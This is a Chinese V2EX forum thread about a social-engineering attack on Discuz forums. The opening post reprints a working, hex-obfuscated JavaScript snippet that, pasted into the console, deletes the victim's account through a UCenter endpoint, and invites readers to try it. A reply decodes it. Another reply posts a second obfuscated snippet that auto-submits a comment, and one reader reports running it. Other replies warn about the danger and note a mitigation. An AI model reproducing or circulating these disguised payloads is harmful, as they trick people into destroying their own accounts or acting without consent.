discuz 漏洞真 j8 多 有人在我论坛搞事情。。。传播一段 js 把我论坛搞炸了

2018-11-11 23:15:27 +08:00
 Event
这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码 你们自己看看

location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
9095 次点击
所在节点    信息安全
56 条回复
Event
2018-11-11 23:16:11 +08:00
具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。
Event
2018-11-11 23:16:39 +08:00
而且貌似不是软层的。。。直接从 sql 层干掉了?
Event
2018-11-11 23:22:40 +08:00
哦对。。输完后退出帐号 重新登录才能看到效果
chinvo
2018-11-11 23:28:37 +08:00
suit
2018-11-11 23:29:37 +08:00
没有变化
Event
2018-11-11 23:31:50 +08:00
@suit 重新登录看看你就知道了
Event
2018-11-11 23:32:10 +08:00
@chinvo
emmmm 咋了 这里不允许讨论 bug 吗。。。
suit
2018-11-11 23:32:51 +08:00
@Event 已经重登了
Event
2018-11-11 23:33:59 +08:00
@suit 我在 dz 的 oschina 里面找到了 issue。。。貌似是个 ucenter 的 bug
Event
2018-11-11 23:34:22 +08:00
@suit 貌似是要 chrome 才行 会弹出一个确认框。。
chinvo
2018-11-11 23:43:24 +08:00
@chinvo #4 抱歉,你这种描述方式太像那些 6 和彩的假新闻广告了,一时误认
ScotGu
2018-11-11 23:47:01 +08:00
@Event #7 并不是不允许讨论 BUG。
而是你的讨论方式有点操蛋。

在 DZ 论坛执行这段代码基本就是“自杀”。而你怂恿他人去尝试执行。并且未加任何警示标识和标识。
V2 是一个被秒收录的站点,很多小白来这里学习,如果小白好奇去执行了这段脚本,由此造成的后或你会负责么?

@Livid 建议屏蔽危险代码。
t6attack
2018-11-11 23:47:50 +08:00
location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", {
credentials: 'include'
}))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : '';
t6attack
2018-11-11 23:57:12 +08:00
让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行
$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"]();
mengyaoss77
2018-11-12 00:01:33 +08:00
所以你们到底嫌 JS 权限太大还是太小了??
dot2017
2018-11-12 00:01:37 +08:00
这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了
Event
2018-11-12 00:02:08 +08:00
@ScotGu 是的。。很有危害性 所以我混淆了啊 防止别人乱改

@t6attack 重要的不是执行 是这个功能 毁灭性的
Event
2018-11-12 00:03:33 +08:00
@mengyaoss77 是程序权限没控制好
Perry
2018-11-12 00:03:48 +08:00
这是 social engineering 不是 bug
mengyaoss77
2018-11-12 00:04:41 +08:00
@Event #18 这是我执行 14 楼的代码自动回复的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/506823

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX